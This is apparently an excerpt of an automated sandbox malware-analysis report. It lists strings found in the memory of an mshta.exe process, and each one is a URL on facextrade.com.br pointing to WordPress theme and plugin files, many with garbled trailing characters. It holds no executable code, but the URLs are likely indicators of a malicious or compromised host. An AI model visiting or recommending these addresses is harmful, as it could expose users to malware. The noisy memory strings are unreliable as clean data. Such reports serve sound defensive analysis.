Source: mshta.exe, 00000008.00000002.1165724575.000000000035E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.20WV
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/switcher.png
Source: mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/switcher.pngXo
Source: mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2$
Source: mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2C:
Source: mshta.exe, 00000008.00000002.1165724575.000000000035E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2qV
Source: mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets//lib/owl/assets/owl.theme.d
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/css/logo-slider-wp-public.c
Source: mshta.exe, 00000008.00000002.1168486528.0000000002D48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/img/next.pnghttp://facextra
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1165831410.00000000003A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/js/logo-slider-wp-public.js
Source: mshta.exe, 00000008.00000002.1165724575.000000000035E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/lib/animate/animate-logo.cs
Source: mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/lib/owl/assets/owl.carousel
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/lib/owl/owl.carousel.js?ver
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/motopress-content-editor/bootstrap/bootstrap-grid.min.cs
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/motopress-content-editor/includes/css/theme.css?ver=1.5.
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes
Source: mshta.exe, 00000008.00000002.1184894258.0000000009A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramewo
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework
Source: mshta.exe, 00000008.00000002.1168302707.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/admin/data_management/
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0Nm
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0nl
Source: mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/camera.css
Source: mshta.exe, 00000008.00000002.1165855199.00000000003B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/camera.css_&
Source: mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/camera.cssp
Source: mshta.exe, 00000008.00000002.1165855199.00000000003B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/camera.csssM
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/magnific-popup.css?ver=0.9.3
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/magnific-popup.css?ver=0.9.3%W
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/magnific-popup.css?ver=0.9.3QW
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/style.css
Source: mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/style.csss
Source: mshta.exe, 00000008.00000002.1165962567.00000000003F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.png
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.png.0
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.png1.0
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.png8
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.png=1.0I
Source: mshta.exe, 00000008.00000002.1175277603.000000000528C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.pngery.flexslider-min.js?
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.pngp
Source: mshta.exe, 00000008.00000002.1184894258.0000000009A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.40ET4.0E)p
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.42.6.0leme
Source: mshta.exe, 00000008.00000002.1180046658.0000000006802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4?ver=2.1.09.31.
Source: mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4?ver=2.1.0rj
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4C:
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4ET4.0E)
Source: mshta.exe, 00000008.00000002.1184894258.0000000009A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4US
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4er=2.1.0c
Source: mshta.exe, 00000008.00000003.1036123711.0000000003805000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170700641.0000000003806000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4http://facextra
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/custom.js?ver=1.0
Source: mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/custom.js?ver=1.0(
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/custom.js?ver=1.0.0.NET4.0E)
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/custom.js?ver=1.00C;
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/custom.js?ver=1.0=1.0
Source: mshta.exe, 00000008.00000002.1168275161.0000000002C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/custom.js?ver=1.0http://facextrade.com
Source: mshta.exe, 00000008.00000002.1184894258.0000000009A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.01.0)l
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.02.6.00
Source: mshta.exe, 00000008.00000002.1184894258.0000000009A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.09
Source: mshta.exe, 00000008.00000002.1184894258.0000000009A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0=1.0
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0ET4.0E)
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0US
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0lK_0
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0teCombo;vaUH
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.0
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.0-US
Source: mshta.exe, 00000008.00000002.1165724575.000000000035E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.0ET4.0C;
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1165962567.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1184894258.0000000009A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jplayer.playlist.min.js?ver=2.3.0
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jplayer.playlist.min.js?ver=2.3.0-
Source: mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jplayer.playlist.min.js?ver=2.3.0.3
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jplayer.playlist.min.js?ver=2.3.064
Source: mshta.exe, 00000008.00000003.1036123711.0000000003805000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170700641.0000000003806000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jplayer.playlist.min.js?ver=2.3.0http:
Source: mshta.exe, 00000008.00000002.1184894258.0000000009A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jplayer.playlist.min.js?ver=2.3.0sJ
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2)
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.22W
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2:29:C:
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2=T
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2ET4.0E)
Source: mshta.exe, 00000008.00000002.1167751704.0000000002B43000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1063601637.0000000002B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2Pc
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2WI
Source: mshta.exe, 00000008.00000002.1165724575.000000000035E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2d.min.css
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-migrate-1.2.1.min.js?ver=1.2.1
Source: mshta.exe, 00000008.00000002.1165724575.000000000035E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-migrate-1.2.1.min.js?ver=1.2.1?
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-migrate-1.2.1.min.js?ver=1.2.1M
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-migrate-1.2.1.min.js?ver=1.2.1c
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-migrate-1.2.1.min.js?ver=1.2.1~
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1165962567.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.0
Source: mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.0.3
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.00E)(
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.00eEve
Source: mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1184894258.0000000009A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.magnific-popup.min.js?ver=0.9.3
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobile.customized.min.js
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobile.customized.min.jsC:
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobile.customized.min.jsJl
Source: mshta.exe, 00000008.00000002.1165962567.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobilemenu.js?ver=1.0
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobilemenu.js?ver=1.0)
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobilemenu.js?ver=1.0)X
Source: mshta.exe, 00000008.00000002.1184894258.0000000009A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobilemenu.js?ver=1.0.NET4.0E)
Source: mshta.exe, 00000008.00000002.1184894258.0000000009A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobilemenu.js?ver=1.01.0
Source: mshta.exe, 00000008.00000002.1184894258.0000000009A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobilemenu.js?ver=1.0GJ
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1165962567.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0)?g
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.09.20
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0XH
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0cumO
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0s
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1043730529.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1171490862.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6-US
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6.NET4.0E)
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.60C;
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.60E)?
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6C:
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1165991500.0000000000402000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1184894258.0000000009A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3-US
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3.NET4.0E)
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.30C;
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.319
